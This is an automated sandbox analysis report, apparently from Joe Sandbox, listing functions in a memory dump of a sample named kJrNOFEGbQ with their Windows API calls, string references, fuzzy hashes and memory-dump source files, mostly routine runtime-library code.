Opcode ID: 8865c3d6bc2f707be0b3d623be98b70364e6eb0f97b9e0ecdf71d3d0d0701806
Instruction ID: 967dc699e623174b825fd429787f518f1266d0e1be50430a78f28f718e414137
Opcode Fuzzy Hash: 8865c3d6bc2f707be0b3d623be98b70364e6eb0f97b9e0ecdf71d3d0d0701806
Instruction Fuzzy Hash: 74117C30910204EBDF225F64C804B693BADBB52364F11C92BE42786698D7759E44DB61

Function 0038AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00383F73,00000000,00000000,?,0038ACDB,00383F73,00000000,00000000,00000000,?,0038AED8,00000006,FlsSetValue), ref: 0038AD66
GetLastError.KERNEL32(?,0038ACDB,00383F73,00000000,00000000,00000000,?,0038AED8,00000006,FlsSetValue,00397970,FlsSetValue,00000000,00000364,?,003898B7), ref: 0038AD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0038ACDB,00383F73,00000000,00000000,00000000,?,0038AED8,00000006,FlsSetValue,00397970,FlsSetValue,00000000), ref: 0038AD80

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 69f37045b6a9aae892b1241cf1ccf9cb4d5dc9edb00c3f0b77d7b48a5fbe640a
Instruction ID: 65505b8a6308959c17af99b6e6f987517b94ab0bba0fbef81e1efc3fda9e50e0
Opcode Fuzzy Hash: 69f37045b6a9aae892b1241cf1ccf9cb4d5dc9edb00c3f0b77d7b48a5fbe640a
Instruction Fuzzy Hash: 49014736201B22ABD7235B68DC54A977B9CEF017A2B220662F906D3660C722DC09C7E1

Function 0038BA27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 003897E5: GetLastError.KERNEL32(?,003A1030,00384674,003A1030,?,?,00383F73,00000050,?,003A1030,00000200), ref: 003897E9
Part of subcall function 003897E5: _free.LIBCMT ref: 0038981C
Part of subcall function 003897E5: SetLastError.KERNEL32(00000000,?,003A1030,00000200), ref: 0038985D
Part of subcall function 003897E5: _abort.LIBCMT ref: 00389863

Part of subcall function 0038BB4E: _abort.LIBCMT ref: 0038BB80
Part of subcall function 0038BB4E: _free.LIBCMT ref: 0038BBB4

Part of subcall function 0038B7BB: GetOEMCP.KERNEL32(00000000,?,?,0038BA44,?), ref: 0038B7E6

_free.LIBCMT ref: 0038BA9F
_free.LIBCMT ref: 0038BAD5

Strings

p9, xrefs: 0038BAC9

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID: p9
API String ID: 2991157371-1904256876
Opcode ID: d5b9743be0a647d531717e361829722d61082cca857472ec6b5a934df3aa554f
Instruction ID: 62eea3126074b3945908e62a9fa0cd2e2dcd882ad07054224f9047ec0b8eaaa7
Opcode Fuzzy Hash: d5b9743be0a647d531717e361829722d61082cca857472ec6b5a934df3aa554f
Instruction Fuzzy Hash: A531813190434AAFDB16FFA8D441BADB7E5EF40320F2540DAE5149B2A2EB369D41DB50

Function 00388268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 0038BF30: GetEnvironmentStringsW.KERNEL32 ref: 0038BF39
Part of subcall function 0038BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0038BF5C
Part of subcall function 0038BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0038BF82
Part of subcall function 0038BF30: _free.LIBCMT ref: 0038BF95
Part of subcall function 0038BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0038BFA4

_free.LIBCMT ref: 003882AE
_free.LIBCMT ref: 003882B5

Strings

0"<, xrefs: 0038829B

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
String ID: 0"<
API String ID: 400815659-1408697893
Opcode ID: 42dfa383a465bdd28affc9e84fab505774441cb54ce13ecad444b25ddfb2999c
Instruction ID: d43d7998bbae99f109b1947f12511610b6e2628786b1e6c23e773b13fbc0dd71
Opcode Fuzzy Hash: 42dfa383a465bdd28affc9e84fab505774441cb54ce13ecad444b25ddfb2999c
Instruction Fuzzy Hash: 3FE0E523605F4245D2A333792C02F6B06094FC1338BA50EDAF910DE1D3CE50880307A2

Function 0037E532 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E51F

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

PDu<7, xrefs: 0037E519
27, xrefs: 0037E532

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 27$PDu<7
API String ID: 1269201914-895419741
Opcode ID: b13ffe9f40dfeb83c164d61366327faa248e8ccd9a00855aac5648b0c8c7161d
Instruction ID: e754d97d50ddcf497246f5aecd55ba9d29706f674bd3a98891bee039a0d429ff
Opcode Fuzzy Hash: b13ffe9f40dfeb83c164d61366327faa248e8ccd9a00855aac5648b0c8c7161d
Instruction Fuzzy Hash: 0FB012CB2680007D321761081D02F7B021CC0CAF20330D06EF42DC4480E8444C000533

Function 0037E528 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E51F

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

(7, xrefs: 0037E528
PDu<7, xrefs: 0037E519

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: (7$PDu<7
API String ID: 1269201914-270680953
Opcode ID: 0a1e46f7b389dfcf375f5eeb5fa34b4499e1e6c737d2e5ee11e401bde62508ca
Instruction ID: e6849191d093bfce8e9202c78f756fff82d87949da97d0c262123808e55bb0cc
Opcode Fuzzy Hash: 0a1e46f7b389dfcf375f5eeb5fa34b4499e1e6c737d2e5ee11e401bde62508ca
Instruction Fuzzy Hash: 35B012CB2680407C321761081E02E3B071CC0CAF20330D06EF42DC4480E8454C010533

Function 00369F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,0036D343,00000001,?,?,?,00000000,0037551D,?,?,?), ref: 00369F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0037551D,?,?,?,?,?,00374FC7,?), ref: 00369FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0036D343,00000001,?,?), ref: 0036A011

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 0e737175e314012d2191ac1bd07a11bd0580d964738aafa825d78cf2a46fc9d9
Instruction ID: bcf7c35072c9266449ec111191044a727ac44cc01387955a23b15728a04c3607
Opcode Fuzzy Hash: 0e737175e314012d2191ac1bd07a11bd0580d964738aafa825d78cf2a46fc9d9
Instruction Fuzzy Hash: C131B171208305AFDB16CF24D818B6E77A9FF84711F05891EF981AB294C775AD48CBA2

Function 0036A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 0036C27E: _wcslen.LIBCMT ref: 0036C284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A30C
GetLastError.KERNEL32(?,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A329

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: 86c07ad34b9c786b3b5b2dbaa7ab2922ec5dcdcd5309fef30e1c5a8dc1fe1954
Instruction ID: d731d80e32b3320f0d976751a130050523f4ec11e1158e4e8c95aac4a53b72d3
Opcode Fuzzy Hash: 86c07ad34b9c786b3b5b2dbaa7ab2922ec5dcdcd5309fef30e1c5a8dc1fe1954
Instruction Fuzzy Hash: 5701D839100A106AEF23AB754C49BFE775CAF09780F14C415F902F6299D754CA81CEB6

Function 0038B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0038B8B8

Strings

, xrefs: 0038B8FD

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 209060d9d4264143f1261b75fa61a219461b45db68d9058aae3d6d9cd9da4203
Instruction ID: 1e8ce6d83912723e40514325ee06ca16f00b0c670fac131bb9605746dd627ec4
Opcode Fuzzy Hash: 209060d9d4264143f1261b75fa61a219461b45db68d9058aae3d6d9cd9da4203
Instruction Fuzzy Hash: 2E41F57050438D9FDB239E688C84BE6FBADEB45304F1404EDE69AC6242D335AA458F60

Function 0038AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0038AFDD

Strings

LCMapStringEx, xrefs: 0038AF7D, 0038AF87

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: ecb210d873d19454d055ec17c7fc5bef577d1631a788652c9275f5beece13dbf
Instruction ID: 16c378bc9ea4b2a8b50c0580d85da06b4b4faa550ac5203d0af4c5dbc1a91d85
Opcode Fuzzy Hash: ecb210d873d19454d055ec17c7fc5bef577d1631a788652c9275f5beece13dbf
Instruction Fuzzy Hash: 4C01E572504219BBDF13AF90DC06DEE7F66EF09750F054156FE186A160CB368A31AB91

Function 0038AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0038A56F), ref: 0038AF55

Strings

InitializeCriticalSectionEx, xrefs: 0038AF1B, 0038AF25

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 9031481960a7ddda2228c16f65e870288dc1da20233bdd2c68a9d870ff67f0b6
Instruction ID: 0d5692a7007806106bfafd5184417f064221c224caf3af2deaccd48c7553700c
Opcode Fuzzy Hash: 9031481960a7ddda2228c16f65e870288dc1da20233bdd2c68a9d870ff67f0b6
Instruction Fuzzy Hash: A2F0E971645208BFDF176F55CC02C9E7F65EF04711F404096FD099A260DB725E109B8A

Function 0038ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0038ADEE

Strings

FlsAlloc, xrefs: 0038ADC0, 0038ADCA

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: a5f3c9917067356a89b227854801f57034b4909ce175ea73dbbd0add16f068e3
Instruction ID: 810f9c1405f9ecbdf1bc7d0fcdc14378f469571fde1db9fffa9f06ab3ffbe23f
Opcode Fuzzy Hash: a5f3c9917067356a89b227854801f57034b4909ce175ea73dbbd0add16f068e3
Instruction Fuzzy Hash: ECE0E5716453187BDA13BB65DC129AEBB68DB04721F01019BF805A7290DE725E0087DA

Function 0037E1F6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

7, xrefs: 0037E1DD

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 7
API String ID: 1269201914-626684421
Opcode ID: ec8a97e56791c23a6edbbdb5db5cc4991a656fc37747ff8af1d0ec10ecefa965
Instruction ID: 04c905a5084346709a6b56c718675343d2da1ec35115bfbdd144735f725633f6
Opcode Fuzzy Hash: ec8a97e56791c23a6edbbdb5db5cc4991a656fc37747ff8af1d0ec10ecefa965
Instruction Fuzzy Hash: 92B012D5268000BC3217F2465C03E37010CC5CAF10330C07FFC2DC5680D844AC040532

Function 0037E1EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

7, xrefs: 0037E1DD

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 7
API String ID: 1269201914-626684421
Opcode ID: c9c59e3387782db638b979a511a69470793a6755391f32b4882f1894cf5d3384
Instruction ID: 59e1fb83b4f69a4c5114f00aa75f15dff29b6fa63859c090917c9148c44ac4d0
Opcode Fuzzy Hash: c9c59e3387782db638b979a511a69470793a6755391f32b4882f1894cf5d3384
Instruction Fuzzy Hash: E2B012D92AC100BC3217E18A5C03E77011CC1C9F10330C07EF82DC5480D8446C000632

Function 0037E1D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

7, xrefs: 0037E1DD

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 7
API String ID: 1269201914-626684421
Opcode ID: 64676ccb729ecd176355b4a11b6a4ff8a298ad955896f3315ef63a0cd94b0809
Instruction ID: bebc4bbc424628a5915c9e1aab729a6abe3e771f00f98417f2a9b99cbeebba6f
Opcode Fuzzy Hash: 64676ccb729ecd176355b4a11b6a4ff8a298ad955896f3315ef63a0cd94b0809
Instruction Fuzzy Hash: 77B012D92A8100BC3217B1865C03D37011CC1CAF10330C47EFC29D4880D844AC000432

Function 0037E232 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3

Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1

Strings

7, xrefs: 0037E1DD

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 7
API String ID: 1269201914-626684421
Opcode ID: f943f165fa695314d27e62daa51d25196932e6a5e8a0c83d5ae699b6147c73fd
Instruction ID: 6b3531876b771359fa0777813345a643f316a81e8f8311e74bde98e97b18693d
Opcode Fuzzy Hash: f943f165fa695314d27e62daa51d25196932e6a5e8a0c83d5ae699b6147c73fd
Instruction Fuzzy Hash: CFB012E5268000BC3217E1475D03E37010CC1C9F10330C07EF82DC5480DC446E010532

